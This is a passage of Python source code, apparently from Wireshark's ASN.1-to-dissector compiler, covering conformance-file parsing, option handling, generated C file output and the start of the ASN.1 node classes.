self.add_item('SYNTAX', name, attr=attr, fn=fn, lineno=lineno)
return
def add_register(self, pdu, par, fn, lineno):
#print "add_register(pdu=%s, par=%s, %s, %d)" % (pdu, str(par), fn, lineno)
if (par[0] in ('N', 'NUM')): rtype = 'NUM'; (pmin, pmax) = (2, 2)
elif (par[0] in ('S', 'STR')): rtype = 'STR'; (pmin, pmax) = (2, 2)
elif (par[0] in ('B', 'BER')): rtype = 'BER'; (pmin, pmax) = (1, 2)
elif (par[0] in ('P', 'PER')): rtype = 'PER'; (pmin, pmax) = (1, 2)
else: warnings.warn_explicit("Unknown registration type '%s'" % (par[2]), UserWarning, fn, lineno); return
if ((len(par)-1) < pmin):
warnings.warn_explicit("Too few parameters for %s registration type. At least %d parameters are required" % (rtype, pmin), UserWarning, fn, lineno)
return
if ((len(par)-1) > pmax):
warnings.warn_explicit("Too many parameters for %s registration type. Only %d parameters are allowed" % (rtype, pmax), UserWarning, fn, lineno)
attr = {'pdu' : pdu, 'rtype' : rtype}
if (rtype in ('NUM', 'STR')):
attr['rtable'] = par[1]
attr['rport'] = par[2]
rkey = '/'.join([rtype, attr['rtable'], attr['rport']])
elif (rtype in ('BER', 'PER')):
attr['roid'] = par[1]
attr['roidname'] = '""'
if (len(par)>=3):
attr['roidname'] = par[2]
elif attr['roid'][0] != '"':
attr['roidname'] = '"' + attr['roid'] + '"'
rkey = '/'.join([rtype, attr['roid']])
self.add_item('REGISTER', rkey, attr=attr, fn=fn, lineno=lineno)
def check_par(self, par, pmin, pmax, fn, lineno):
for i in range(len(par)):
if par[i] == '-':
par[i] = None
continue
if par[i][0] == '#':
par[i:] = []
break
if len(par) < pmin:
warnings.warn_explicit("Too few parameters. At least %d parameters are required" % (pmin), UserWarning, fn, lineno)
return None
if (pmax >= 0) and (len(par) > pmax):
warnings.warn_explicit("Too many parameters. Only %d parameters are allowed" % (pmax), UserWarning, fn, lineno)
return par[0:pmax]
return par
def read(self, fn):
def get_par(line, pmin, pmax, fn, lineno):
par = line.split(None, pmax)
par = self.check_par(par, pmin, pmax, fn, lineno)
return par
def get_par_nm(line, pmin, pmax, fn, lineno):
if pmax:
par = line.split(None, pmax)
else:
par = [line,]
for i in range(len(par)):
if par[i][0] == '#':
par[i:] = []
break
if len(par) < pmin:
warnings.warn_explicit("Too few parameters. At least %d parameters are required" % (pmin), UserWarning, fn, lineno)
return None
if len(par) > pmax:
nmpar = par[pmax]
else:
nmpar = ''
nmpars = {}
nmpar_first = re.compile(r'^\s*(?P<attr>[_A-Z][_A-Z0-9]*)\s*=\s*')
nmpar_next = re.compile(r'\s+(?P<attr>[_A-Z][_A-Z0-9]*)\s*=\s*')
nmpar_end = re.compile(r'\s*$')
result = nmpar_first.search(nmpar)
pos = 0
while result:
k = result.group('attr')
pos = result.end()
result = nmpar_next.search(nmpar, pos)
p1 = pos
if result:
p2 = result.start()
else:
p2 = nmpar_end.search(nmpar, pos).start()
v = nmpar[p1:p2]
nmpars[k] = v
if len(par) > pmax:
par[pmax] = nmpars
return par
f = open(fn, "r")
lineno = 0
is_import = False
directive = re.compile(r'^\s*#\.(?P<name>[A-Z_][A-Z_0-9]*)(\s+|$)')
cdirective = re.compile(r'^\s*##')
report = re.compile(r'^TABLE(?P<num>\d*)_(?P<type>HDR|BODY|FTR)$')
comment = re.compile(r'^\s*#[^.#]')
empty = re.compile(r'^\s*$')
ctx = None
name = ''
default_flags = 0x00
stack = []
while True:
if not f.closed:
line = f.readline()
lineno += 1
else:
line = None
if not line:
if not f.closed:
f.close()
if stack:
frec = stack.pop()
fn, f, lineno, is_import = frec['fn'], frec['f'], frec['lineno'], frec['is_import']
continue
else:
break
if comment.search(line): continue
result = directive.search(line)
if result: # directive
rep_result = report.search(result.group('name'))
if result.group('name') == 'END_OF_CNF':
f.close()
elif result.group('name') == 'OPT':
ctx = result.group('name')
par = get_par(line[result.end():], 0, -1, fn=fn, lineno=lineno)
if not par: continue
self.set_opt(par[0], par[1:], fn, lineno)
ctx = None
elif result.group('name') in ('PDU', 'PDU_NEW', 'REGISTER', 'REGISTER_NEW',
'MODULE', 'MODULE_IMPORT',
'OMIT_ASSIGNMENT', 'NO_OMIT_ASSGN',
'VIRTUAL_ASSGN', 'SET_TYPE', 'ASSIGN_VALUE_TO_TYPE',
'TYPE_RENAME', 'FIELD_RENAME', 'TF_RENAME', 'IMPORT_TAG',
'TYPE_ATTR', 'ETYPE_ATTR', 'FIELD_ATTR', 'EFIELD_ATTR',
'SYNTAX', 'SYNTAX_NEW'):
ctx = result.group('name')
elif result.group('name') in ('OMIT_ALL_ASSIGNMENTS', 'OMIT_ASSIGNMENTS_EXCEPT',
'OMIT_ALL_TYPE_ASSIGNMENTS', 'OMIT_TYPE_ASSIGNMENTS_EXCEPT',
'OMIT_ALL_VALUE_ASSIGNMENTS', 'OMIT_VALUE_ASSIGNMENTS_EXCEPT'):
ctx = result.group('name')
key = '*'
if ctx in ('OMIT_ALL_TYPE_ASSIGNMENTS', 'OMIT_TYPE_ASSIGNMENTS_EXCEPT'):
key += 'T'
if ctx in ('OMIT_ALL_VALUE_ASSIGNMENTS', 'OMIT_VALUE_ASSIGNMENTS_EXCEPT'):
key += 'V'
par = get_par(line[result.end():], 0, 1, fn=fn, lineno=lineno)
if par:
key += '/' + par[0]
self.add_item('OMIT_ASSIGNMENT', key, omit=True, fn=fn, lineno=lineno)
if ctx in ('OMIT_ASSIGNMENTS_EXCEPT', 'OMIT_TYPE_ASSIGNMENTS_EXCEPT', 'OMIT_VALUE_ASSIGNMENTS_EXCEPT'):
ctx = 'NO_OMIT_ASSGN'
else:
ctx = None
elif result.group('name') in ('EXPORTS', 'MODULE_EXPORTS', 'USER_DEFINED', 'NO_EMIT'):
ctx = result.group('name')
default_flags = EF_TYPE|EF_VALS
if ctx == 'MODULE_EXPORTS':
ctx = 'EXPORTS'
default_flags |= EF_MODULE
if ctx == 'EXPORTS':
par = get_par(line[result.end():], 0, 5, fn=fn, lineno=lineno)
else:
par = get_par(line[result.end():], 0, 1, fn=fn, lineno=lineno)
if not par: continue
p = 1
if (par[0] == 'WITH_VALS'): default_flags |= EF_TYPE|EF_VALS
elif (par[0] == 'WITHOUT_VALS'): default_flags |= EF_TYPE; default_flags &= ~EF_TYPE
elif (par[0] == 'ONLY_VALS'): default_flags &= ~EF_TYPE; default_flags |= EF_VALS
elif (ctx == 'EXPORTS'): p = 0
else: warnings.warn_explicit("Unknown parameter value '%s'" % (par[0]), UserWarning, fn, lineno)
for i in range(p, len(par)):
if (par[i] == 'ONLY_ENUM'): default_flags &= ~(EF_TYPE|EF_VALS); default_flags |= EF_ENUM
elif (par[i] == 'WITH_ENUM'): default_flags |= EF_ENUM
elif (par[i] == 'VALS_WITH_TABLE'): default_flags |= EF_TABLE
elif (par[i] == 'WS_DLL'): default_flags |= EF_WS_DLL
elif (par[i] == 'EXTERN'): default_flags |= EF_EXTERN
elif (par[i] == 'NO_PROT_PREFIX'): default_flags |= EF_NO_PROT
else: warnings.warn_explicit("Unknown parameter value '%s'" % (par[i]), UserWarning, fn, lineno)
elif result.group('name') in ('MAKE_ENUM', 'MAKE_DEFINES'):
ctx = result.group('name')
default_flags = EF_ENUM
if ctx == 'MAKE_ENUM': default_flags |= EF_NO_PROT|EF_NO_TYPE
if ctx == 'MAKE_DEFINES': default_flags |= EF_DEFINE|EF_UCASE|EF_NO_TYPE
par = get_par(line[result.end():], 0, 3, fn=fn, lineno=lineno)
for i in range(0, len(par)):
if (par[i] == 'NO_PROT_PREFIX'): default_flags |= EF_NO_PROT
elif (par[i] == 'PROT_PREFIX'): default_flags &= ~ EF_NO_PROT
elif (par[i] == 'NO_TYPE_PREFIX'): default_flags |= EF_NO_TYPE
elif (par[i] == 'TYPE_PREFIX'): default_flags &= ~ EF_NO_TYPE
elif (par[i] == 'UPPER_CASE'): default_flags |= EF_UCASE
elif (par[i] == 'NO_UPPER_CASE'): default_flags &= ~EF_UCASE
else: warnings.warn_explicit("Unknown parameter value '%s'" % (par[i]), UserWarning, fn, lineno)
elif result.group('name') == 'USE_VALS_EXT':
ctx = result.group('name')
default_flags = 0xFF
elif result.group('name') == 'FN_HDR':
minp = 1
if (ctx in ('FN_PARS',)) and name: minp = 0
par = get_par(line[result.end():], minp, 1, fn=fn, lineno=lineno)
if (not par) and (minp > 0): continue
ctx = result.group('name')
if par: name = par[0]
elif result.group('name') == 'FN_FTR':
minp = 1
if (ctx in ('FN_PARS','FN_HDR')) and name: minp = 0
par = get_par(line[result.end():], minp, 1, fn=fn, lineno=lineno)
if (not par) and (minp > 0): continue
ctx = result.group('name')
if par: name = par[0]
elif result.group('name') == 'FN_BODY':
par = get_par_nm(line[result.end():], 1, 1, fn=fn, lineno=lineno)
if not par: continue
ctx = result.group('name')
name = par[0]
if len(par) > 1:
self.add_item('FN_PARS', name, pars=par[1], fn=fn, lineno=lineno)
elif result.group('name') == 'FN_PARS':
par = get_par_nm(line[result.end():], 0, 1, fn=fn, lineno=lineno)
ctx = result.group('name')
if not par:
name = None
elif len(par) == 1:
name = par[0]
self.add_item(ctx, name, pars={}, fn=fn, lineno=lineno)
elif len(par) > 1:
self.add_item(ctx, par[0], pars=par[1], fn=fn, lineno=lineno)
ctx = None
elif result.group('name') == 'CLASS':
par = get_par(line[result.end():], 1, 1, fn=fn, lineno=lineno)
if not par: continue
ctx = result.group('name')
name = par[0]
add_class_ident(name)
if not name.split('$')[-1].isupper():
warnings.warn_explicit("No lower-case letters shall be included in information object class name (%s)" % (name),
UserWarning, fn, lineno)
elif result.group('name') == 'ASSIGNED_OBJECT_IDENTIFIER':
par = get_par(line[result.end():], 1, 1, fn=fn, lineno=lineno)
if not par: continue
self.update_item('ASSIGNED_ID', 'OBJECT_IDENTIFIER', ids={par[0] : par[0]}, fn=fn, lineno=lineno)
elif rep_result: # Reports
num = rep_result.group('num')
type = rep_result.group('type')
if type == 'BODY':
par = get_par(line[result.end():], 1, 1, fn=fn, lineno=lineno)
if not par: continue
else:
par = get_par(line[result.end():], 0, 0, fn=fn, lineno=lineno)
rep = { 'type' : type, 'var' : None, 'text' : '', 'fn' : fn, 'lineno' : lineno }
if len(par) > 0:
rep['var'] = par[0]
self.report.setdefault(num, []).append(rep)
ctx = 'TABLE'
name = num
elif result.group('name') in ('INCLUDE', 'IMPORT') :
is_imp = result.group('name') == 'IMPORT'
par = get_par(line[result.end():], 1, 1, fn=fn, lineno=lineno)
if not par:
warnings.warn_explicit("%s requires parameter" % (result.group('name'),), UserWarning, fn, lineno)
continue
fname = par[0]
#print "Try include: %s" % (fname)
if (not os.path.exists(fname)):
fname = os.path.join(os.path.split(fn)[0], par[0])
#print "Try include: %s" % (fname)
i = 0
while not os.path.exists(fname) and (i < len(self.include_path)):
fname = os.path.join(self.include_path[i], par[0])
#print "Try include: %s" % (fname)
i += 1
if (not os.path.exists(fname)):
if is_imp:
continue # just ignore
else:
fname = par[0] # report error
fnew = open(fname, "r")
stack.append({'fn' : fn, 'f' : f, 'lineno' : lineno, 'is_import' : is_import})
fn, f, lineno, is_import = par[0], fnew, 0, is_imp
elif result.group('name') == 'END':
ctx = None
else:
warnings.warn_explicit("Unknown directive '%s'" % (result.group('name')), UserWarning, fn, lineno)
continue
if not ctx:
if not empty.match(line):
warnings.warn_explicit("Non-empty line in empty context", UserWarning, fn, lineno)
elif ctx == 'OPT':
if empty.match(line): continue
par = get_par(line, 1, -1, fn=fn, lineno=lineno)
if not par: continue
self.set_opt(par[0], par[1:], fn, lineno)
elif ctx in ('EXPORTS', 'USER_DEFINED', 'NO_EMIT'):
if empty.match(line): continue
if ctx == 'EXPORTS':
par = get_par(line, 1, 6, fn=fn, lineno=lineno)
else:
par = get_par(line, 1, 2, fn=fn, lineno=lineno)
if not par: continue
flags = default_flags
p = 2
if (len(par)>=2):
if (par[1] == 'WITH_VALS'): flags |= EF_TYPE|EF_VALS
elif (par[1] == 'WITHOUT_VALS'): flags |= EF_TYPE; flags &= ~EF_TYPE
elif (par[1] == 'ONLY_VALS'): flags &= ~EF_TYPE; flags |= EF_VALS
elif (ctx == 'EXPORTS'): p = 1
else: warnings.warn_explicit("Unknown parameter value '%s'" % (par[1]), UserWarning, fn, lineno)
for i in range(p, len(par)):
if (par[i] == 'ONLY_ENUM'): flags &= ~(EF_TYPE|EF_VALS); flags |= EF_ENUM
elif (par[i] == 'WITH_ENUM'): flags |= EF_ENUM
elif (par[i] == 'VALS_WITH_TABLE'): flags |= EF_TABLE
elif (par[i] == 'WS_DLL'): flags |= EF_WS_DLL
elif (par[i] == 'EXTERN'): flags |= EF_EXTERN
elif (par[i] == 'NO_PROT_PREFIX'): flags |= EF_NO_PROT
else: warnings.warn_explicit("Unknown parameter value '%s'" % (par[i]), UserWarning, fn, lineno)
self.add_item(ctx, par[0], flag=flags, fn=fn, lineno=lineno)
elif ctx in ('MAKE_ENUM', 'MAKE_DEFINES'):
if empty.match(line): continue
par = get_par(line, 1, 4, fn=fn, lineno=lineno)
if not par: continue
flags = default_flags
for i in range(1, len(par)):
if (par[i] == 'NO_PROT_PREFIX'): flags |= EF_NO_PROT
elif (par[i] == 'PROT_PREFIX'): flags &= ~ EF_NO_PROT
elif (par[i] == 'NO_TYPE_PREFIX'): flags |= EF_NO_TYPE
elif (par[i] == 'TYPE_PREFIX'): flags &= ~ EF_NO_TYPE
elif (par[i] == 'UPPER_CASE'): flags |= EF_UCASE
elif (par[i] == 'NO_UPPER_CASE'): flags &= ~EF_UCASE
else: warnings.warn_explicit("Unknown parameter value '%s'" % (par[i]), UserWarning, fn, lineno)
self.add_item('MAKE_ENUM', par[0], flag=flags, fn=fn, lineno=lineno)
elif ctx == 'USE_VALS_EXT':
if empty.match(line): continue
par = get_par(line, 1, 1, fn=fn, lineno=lineno)
if not par: continue
flags = default_flags
self.add_item('USE_VALS_EXT', par[0], flag=flags, fn=fn, lineno=lineno)
elif ctx in ('PDU', 'PDU_NEW'):
if empty.match(line): continue
par = get_par(line, 1, 5, fn=fn, lineno=lineno)
if not par: continue
is_new = False
if (ctx == 'PDU_NEW'): is_new = True
self.add_pdu(par[0:2], is_new, fn, lineno)
if (len(par)>=3):
self.add_register(par[0], par[2:5], fn, lineno)
elif ctx in ('SYNTAX', 'SYNTAX_NEW'):
if empty.match(line): continue
par = get_par(line, 1, 2, fn=fn, lineno=lineno)
if not par: continue
if not self.check_item('PDU', par[0]):
is_new = False
if (ctx == 'SYNTAX_NEW'): is_new = True
self.add_pdu(par[0:1], is_new, fn, lineno)
self.add_syntax(par, fn, lineno)
elif ctx in ('REGISTER', 'REGISTER_NEW'):
if empty.match(line): continue
par = get_par(line, 3, 4, fn=fn, lineno=lineno)
if not par: continue
if not self.check_item('PDU', par[0]):
is_new = False
if (ctx == 'REGISTER_NEW'): is_new = True
self.add_pdu(par[0:1], is_new, fn, lineno)
self.add_register(par[0], par[1:4], fn, lineno)
elif ctx in ('MODULE', 'MODULE_IMPORT'):
if empty.match(line): continue
par = get_par(line, 2, 2, fn=fn, lineno=lineno)
if not par: continue
self.add_item('MODULE', par[0], proto=par[1], fn=fn, lineno=lineno)
elif ctx == 'IMPORT_TAG':
if empty.match(line): continue
par = get_par(line, 3, 3, fn=fn, lineno=lineno)
if not par: continue
self.add_item(ctx, par[0], ttag=(par[1], par[2]), fn=fn, lineno=lineno)
elif ctx == 'OMIT_ASSIGNMENT':
if empty.match(line): continue
par = get_par(line, 1, 1, fn=fn, lineno=lineno)
if not par: continue
self.add_item(ctx, par[0], omit=True, fn=fn, lineno=lineno)
elif ctx == 'NO_OMIT_ASSGN':
if empty.match(line): continue
par = get_par(line, 1, 1, fn=fn, lineno=lineno)
if not par: continue
self.add_item(ctx, par[0], omit=False, fn=fn, lineno=lineno)
elif ctx == 'VIRTUAL_ASSGN':
if empty.match(line): continue
par = get_par(line, 2, -1, fn=fn, lineno=lineno)
if not par: continue
if (len(par[1].split('/')) > 1) and not self.check_item('SET_TYPE', par[1]):
self.add_item('SET_TYPE', par[1], type=par[0], fn=fn, lineno=lineno)
self.add_item('VIRTUAL_ASSGN', par[1], name=par[0], fn=fn, lineno=lineno)
for nm in par[2:]:
self.add_item('SET_TYPE', nm, type=par[0], fn=fn, lineno=lineno)
if not par[0][0].isupper():
warnings.warn_explicit("Virtual assignment should have uppercase name (%s)" % (par[0]),
UserWarning, fn, lineno)
elif ctx == 'SET_TYPE':
if empty.match(line): continue
par = get_par(line, 2, 2, fn=fn, lineno=lineno)
if not par: continue
if not self.check_item('VIRTUAL_ASSGN', par[0]):
self.add_item('SET_TYPE', par[0], type=par[1], fn=fn, lineno=lineno)
if not par[1][0].isupper():
warnings.warn_explicit("Set type should have uppercase name (%s)" % (par[1]),
UserWarning, fn, lineno)
elif ctx == 'ASSIGN_VALUE_TO_TYPE':
if empty.match(line): continue
par = get_par(line, 2, 2, fn=fn, lineno=lineno)
if not par: continue
self.add_item(ctx, par[0], name=par[1], fn=fn, lineno=lineno)
elif ctx == 'TYPE_RENAME':
if empty.match(line): continue
par = get_par(line, 2, 2, fn=fn, lineno=lineno)
if not par: continue
self.add_item('TYPE_RENAME', par[0], eth_name=par[1], fn=fn, lineno=lineno)
if not par[1][0].isupper():
warnings.warn_explicit("Type should be renamed to uppercase name (%s)" % (par[1]),
UserWarning, fn, lineno)
elif ctx == 'FIELD_RENAME':
if empty.match(line): continue
par = get_par(line, 2, 2, fn=fn, lineno=lineno)
if not par: continue
self.add_item('FIELD_RENAME', par[0], eth_name=par[1], fn=fn, lineno=lineno)
if not par[1][0].islower():
warnings.warn_explicit("Field should be renamed to lowercase name (%s)" % (par[1]),
UserWarning, fn, lineno)
elif ctx == 'TF_RENAME':
if empty.match(line): continue
par = get_par(line, 2, 2, fn=fn, lineno=lineno)
if not par: continue
tmpu = par[1][0].upper() + par[1][1:]
tmpl = par[1][0].lower() + par[1][1:]
self.add_item('TYPE_RENAME', par[0], eth_name=tmpu, fn=fn, lineno=lineno)
if not tmpu[0].isupper():
warnings.warn_explicit("Type should be renamed to uppercase name (%s)" % (par[1]),
UserWarning, fn, lineno)
self.add_item('FIELD_RENAME', par[0], eth_name=tmpl, fn=fn, lineno=lineno)
if not tmpl[0].islower():
warnings.warn_explicit("Field should be renamed to lowercase name (%s)" % (par[1]),
UserWarning, fn, lineno)
elif ctx in ('TYPE_ATTR', 'ETYPE_ATTR', 'FIELD_ATTR', 'EFIELD_ATTR'):
if empty.match(line): continue
par = get_par_nm(line, 1, 1, fn=fn, lineno=lineno)
if not par: continue
self.add_item(ctx, par[0], attr=par[1], fn=fn, lineno=lineno)
elif ctx == 'FN_PARS':
if empty.match(line): continue
if name:
par = get_par_nm(line, 0, 0, fn=fn, lineno=lineno)
else:
par = get_par_nm(line, 1, 1, fn=fn, lineno=lineno)
if not par: continue
if name:
self.update_item(ctx, name, pars=par[0], fn=fn, lineno=lineno)
else:
self.add_item(ctx, par[0], pars=par[1], fn=fn, lineno=lineno)
elif ctx in ('FN_HDR', 'FN_FTR', 'FN_BODY'):
result = cdirective.search(line)
if result: # directive
line = '#' + line[result.end():]
self.add_fn_line(name, ctx, line, fn=fn, lineno=lineno)
elif ctx == 'CLASS':
if empty.match(line): continue
par = get_par(line, 1, 3, fn=fn, lineno=lineno)
if not par: continue
if not set_type_to_class(name, par[0], par[1:]):
warnings.warn_explicit("Could not set type of class member %s.&%s to %s" % (name, par[0], par[1]),
UserWarning, fn, lineno)
elif ctx == 'TABLE':
self.report[name][-1]['text'] += line
def set_opt(self, opt, par, fn, lineno):
#print "set_opt: %s, %s" % (opt, par)
if opt in ("-I",):
par = self.check_par(par, 1, 1, fn, lineno)
if not par: return
self.include_path.append(par[0])
elif opt in ("-b", "BER", "CER", "DER"):
par = self.check_par(par, 0, 0, fn, lineno)
self.ectx.encoding = 'ber'
elif opt in ("PER",):
par = self.check_par(par, 0, 0, fn, lineno)
self.ectx.encoding = 'per'
elif opt in ("-p", "PROTO"):
par = self.check_par(par, 1, 1, fn, lineno)
if not par: return
self.ectx.proto_opt = par[0]
self.ectx.merge_modules = True
elif opt in ("ALIGNED",):
par = self.check_par(par, 0, 0, fn, lineno)
self.ectx.aligned = True
elif opt in ("-u", "UNALIGNED"):
par = self.check_par(par, 0, 0, fn, lineno)
self.ectx.aligned = False
elif opt in ("-d",):
par = self.check_par(par, 1, 1, fn, lineno)
if not par: return
self.ectx.dbgopt = par[0]
elif opt in ("-e",):
par = self.check_par(par, 0, 0, fn, lineno)
self.ectx.expcnf = True
elif opt in ("-S",):
par = self.check_par(par, 0, 0, fn, lineno)
self.ectx.merge_modules = True
elif opt in ("GROUP_BY_PROT",):
par = self.check_par(par, 0, 0, fn, lineno)
self.ectx.group_by_prot = True
elif opt in ("-o",):
par = self.check_par(par, 1, 1, fn, lineno)
if not par: return
self.ectx.outnm_opt = par[0]
elif opt in ("-O",):
par = self.check_par(par, 1, 1, fn, lineno)
if not par: return
self.ectx.output.outdir = par[0]
elif opt in ("-s",):
par = self.check_par(par, 1, 1, fn, lineno)
if not par: return
self.ectx.output.single_file = par[0]
elif opt in ("-k",):
par = self.check_par(par, 0, 0, fn, lineno)
self.ectx.output.keep = True
elif opt in ("-L",):
par = self.check_par(par, 0, 0, fn, lineno)
self.suppress_line = True
elif opt in ("EMBEDDED_PDV_CB",):
par = self.check_par(par, 1, 1, fn, lineno)
if not par: return
self.ectx.default_embedded_pdv_cb = par[0]
elif opt in ("EXTERNAL_TYPE_CB",):
par = self.check_par(par, 1, 1, fn, lineno)
if not par: return
self.ectx.default_external_type_cb = par[0]
elif opt in ("-r",):
par = self.check_par(par, 1, 1, fn, lineno)
if not par: return
self.ectx.remove_prefix = par[0]
else:
warnings.warn_explicit("Unknown option %s" % (opt),
UserWarning, fn, lineno)
def dbg_print(self):
print("\n# Conformance values")
print("%-15s %-4s %-15s %-20s %s" % ("File", "Line", "Table", "Key", "Value"))
print("-" * 100)
tbls = sorted(self.table.keys())
for t in tbls:
keys = sorted(self.table[t].keys())
for k in keys:
print("%-15s %4s %-15s %-20s %s" % (
self.table[t][k]['fn'], self.table[t][k]['lineno'], t, k, str(self.table[t][k][self.tblcfg[t]['val_nm']])))
def unused_report(self):
tbls = sorted(self.table.keys())
for t in tbls:
if not self.tblcfg[t]['chk_use']: continue
keys = sorted(self.table[t].keys())
for k in keys:
if not self.table[t][k]['used']:
warnings.warn_explicit("Unused %s for %s" % (t, k),
UserWarning, self.table[t][k]['fn'], self.table[t][k]['lineno'])
fnms = list(self.fn.keys())
fnms.sort()
for f in fnms:
keys = sorted(self.fn[f].keys())
for k in keys:
if not self.fn[f][k]: continue
if not self.fn[f][k]['used']:
warnings.warn_explicit("Unused %s for %s" % (k, f),
UserWarning, self.fn[f][k]['fn'], self.fn[f][k]['lineno'])
#--- EthOut -------------------------------------------------------------------
class EthOut:
def __init__(self):
self.ectx = None
self.outnm = None
self.outdir = '.'
self.single_file = None
self.created_files = {}
self.created_files_ord = []
self.keep = False
def outcomment(self, ln, comment=None):
if comment:
return '%s %s\n' % (comment, ln)
else:
return '/* %-74s */\n' % (ln)
def created_file_add(self, name, keep_anyway):
name = os.path.normcase(os.path.abspath(name))
if name not in self.created_files:
self.created_files_ord.append(name)
self.created_files[name] = keep_anyway
else:
self.created_files[name] = self.created_files[name] or keep_anyway
def created_file_exists(self, name):
name = os.path.normcase(os.path.abspath(name))
return name in self.created_files
#--- output_fname -------------------------------------------------------
def output_fname(self, ftype, ext='c'):
fn = ''
if not ext in ('cnf',):
fn += 'packet-'
fn += self.outnm
if (ftype):
fn += '-' + ftype
fn += '.' + ext
return fn
#--- file_open -------------------------------------------------------
def file_open(self, ftype, ext='c'):
fn = self.output_fname(ftype, ext=ext)
if self.created_file_exists(fn):
fx = open(fn, 'a')
else:
fx = open(fn, 'w')
comment = None
if ext in ('cnf',):
comment = '#'
fx.write(self.fhdr(fn, comment = comment))
else:
if (not self.single_file and not self.created_file_exists(fn)):
fx.write(self.fhdr(fn))
if not self.ectx.merge_modules:
fx.write('\n')
mstr = "--- "
if self.ectx.groups():
mstr += "Module"
if (len(self.ectx.modules) > 1):
mstr += "s"
for (m, p) in self.ectx.modules:
mstr += " %s" % (m)
else:
mstr += "Module %s" % (self.ectx.Module())
mstr += " --- --- ---"
fx.write(self.outcomment(mstr, comment))
fx.write('\n')
return fx
#--- file_close -------------------------------------------------------
def file_close(self, fx, discard=False, keep_anyway=False):
fx.close()
if discard and not self.created_file_exists(fx.name):
os.unlink(fx.name)
else:
self.created_file_add(fx.name, keep_anyway)
#--- fhdr -------------------------------------------------------
def fhdr(self, fn, comment=None):
out = ''
out += self.outcomment('Do not modify this file. Changes will be overwritten.', comment)
out += self.outcomment('Generated automatically by the ASN.1 to Wireshark dissector compiler', comment)
out += self.outcomment(os.path.basename(fn), comment)
out += self.outcomment(' '.join(sys.argv), comment)
out += '\n'
# Make Windows path separator look like Unix path separator
out = out.replace('\\', '/')
# Change absolute paths and relative paths generated outside
# source directory to paths relative to asn1/<proto> subdir.
out = re.sub(r'(\s)[./]\S*(/tools/|/epan/)', r'\1../..\2', out)
out = re.sub(r'(\s)[./]\S*/asn1/\S*?([\s/])', r'\1.\2', out)
return out
#--- dbg_print -------------------------------------------------------
def dbg_print(self):
print("\n# Output files")
print("\n".join(self.created_files_ord))
print("\n")
#--- make_single_file -------------------------------------------------------
def make_single_file(self):
if (not self.single_file): return
in_nm = self.single_file + '.c'
out_nm = os.path.join(self.outdir, self.output_fname(''))
self.do_include(out_nm, in_nm)
in_nm = self.single_file + '.h'
if (os.path.exists(in_nm)):
out_nm = os.path.join(self.outdir, self.output_fname('', ext='h'))
self.do_include(out_nm, in_nm)
if (not self.keep):
for fn in self.created_files_ord:
if not self.created_files[fn]:
os.unlink(fn)
#--- do_include -------------------------------------------------------
def do_include(self, out_nm, in_nm):
def check_file(fn, fnlist):
fnfull = os.path.normcase(os.path.abspath(fn))
if (fnfull in fnlist and os.path.exists(fnfull)):
return os.path.normpath(fn)
return None
fin = open(in_nm, "r")
fout = open(out_nm, "w")
fout.write(self.fhdr(out_nm))
fout.write('/* Input file: ' + os.path.basename(in_nm) +' */\n')
fout.write('\n')
fout.write('#line %u "%s"\n' % (1, rel_dissector_path(in_nm)))
include = re.compile(r'^\s*#\s*include\s+[<"](?P<fname>[^>"]+)[>"]', re.IGNORECASE)
cont_linenum = 0;
while (True):
cont_linenum = cont_linenum + 1;
line = fin.readline()
if (line == ''): break
ifile = None
result = include.search(line)
#if (result): print os.path.normcase(os.path.abspath(result.group('fname')))
if (result):
ifile = check_file(os.path.join(os.path.split(in_nm)[0], result.group('fname')), self.created_files)
if (not ifile):
ifile = check_file(os.path.join(self.outdir, result.group('fname')), self.created_files)
if (not ifile):
ifile = check_file(result.group('fname'), self.created_files)
if (ifile):
fout.write('\n')
fout.write('/*--- Included file: ' + ifile + ' ---*/\n')
fout.write('#line %u "%s"\n' % (1, rel_dissector_path(ifile)))
finc = open(ifile, "r")
fout.write(finc.read())
fout.write('\n')
fout.write('/*--- End of included file: ' + ifile + ' ---*/\n')
fout.write('#line %u "%s"\n' % (cont_linenum+1, rel_dissector_path(in_nm)) )
finc.close()
else:
fout.write(line)
fout.close()
fin.close()
#--- Node ---------------------------------------------------------------------
class Node:
def __init__(self,*args, **kw):
if len (args) == 0:
self.type = self.__class__.__name__
else:
assert (len(args) == 1)
self.type = args[0]
self.__dict__.update (kw)
def str_child (self, key, child, depth):
indent = " " * (2 * depth)
keystr = indent + key + ": "
if key == 'type': # already processed in str_depth
return ""
if isinstance (child, Node): # ugh
return keystr + "\n" + child.str_depth (depth+1)
if isinstance(child, type ([])):
l = []
for x in child:
if isinstance (x, Node):
l.append (x.str_depth (depth+1))
else:
l.append (indent + " " + str(x) + "\n")
return keystr + "[\n" + ''.join(l) + indent + "]\n"
else:
return keystr + str (child) + "\n"
def str_depth (self, depth): # ugh
indent = " " * (2 * depth)
l = ["%s%s" % (indent, self.type)]
l.append ("".join ([self.str_child (k_v[0], k_v[1], depth + 1) for k_v in list(self.__dict__.items ())]))
return "\n".join (l)
def __repr__(self):
return "\n" + self.str_depth (0)
def to_python (self, ctx):
return self.str_depth (ctx.indent_lev)
def eth_reg(self, ident, ectx):
pass
def fld_obj_repr(self, ectx):
return "/* TO DO %s */" % (str(self))
#--- ValueAssignment -------------------------------------------------------------
class ValueAssignment (Node):
def __init__(self,*args, **kw) :
Node.__init__ (self,*args, **kw)
def eth_reg(self, ident, ectx):
if ectx.conform.omit_assignment('V', self.ident, ectx.Module()): return # Assignment to omit
ectx.eth_reg_vassign(self)
ectx.eth_reg_value(self.ident, self.typ, self.val)
#--- ObjectAssignment -------------------------------------------------------------
class ObjectAssignment (Node):
def __init__(self,*args, **kw) :
Node.__init__ (self,*args, **kw)
def __eq__(self, other):
if self.cls != other.cls:
return False
if len(self.val) != len(other.val):
return False
for f in (list(self.val.keys())):
if f not in other.val:
return False
if isinstance(self.val[f], Node) and isinstance(other.val[f], Node):
if not self.val[f].fld_obj_eq(other.val[f]):
return False
else:
if str(self.val[f]) != str(other.val[f]):
return False
return True
def eth_reg(self, ident, ectx):
def make_virtual_type(cls, field, prefix):
if isinstance(self.val, str): return
if field in self.val and not isinstance(self.val[field], Type_Ref):
vnm = prefix + '-' + self.ident
virtual_tr = Type_Ref(val = vnm)
t = self.val[field]
self.val[field] = virtual_tr
ectx.eth_reg_assign(vnm, t, virt=True)
ectx.eth_reg_type(vnm, t)
t.eth_reg_sub(vnm, ectx)
if field in self.val and ectx.conform.check_item('PDU', cls + '.' + field):
ectx.eth_reg_field(self.val[field].val, self.val[field].val, impl=self.val[field].HasImplicitTag(ectx), pdu=ectx.conform.use_item('PDU', cls + '.' + field))
return
